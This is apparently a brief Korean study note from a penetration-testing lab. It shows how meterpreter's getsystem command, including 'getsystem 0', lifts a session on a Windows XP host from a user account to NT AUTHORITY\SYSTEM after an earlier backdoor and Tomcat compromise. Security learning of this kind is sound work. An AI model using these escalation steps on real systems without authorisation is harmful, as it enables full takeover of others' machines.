meterpreter 기능중
권한 상승 기능을 알아보자
전에 Tomcat 취약점 진단할때는 tomcat의 권한으로 들어왔었고
이번 xp backdoor 공격에서는 administratro 권한으로 들어왔었다
이런 권한이 중요한데
meterpreter에서 권한 상승 기능이 있다
getuid로 보면
winxp\kosw 권한으로 나온다
getsystem
getsystem -h
getsystem 0
다시 getuid를 치면 NT AUTHORITY\SYSTEM 권한으로 바낀걸 알수 있다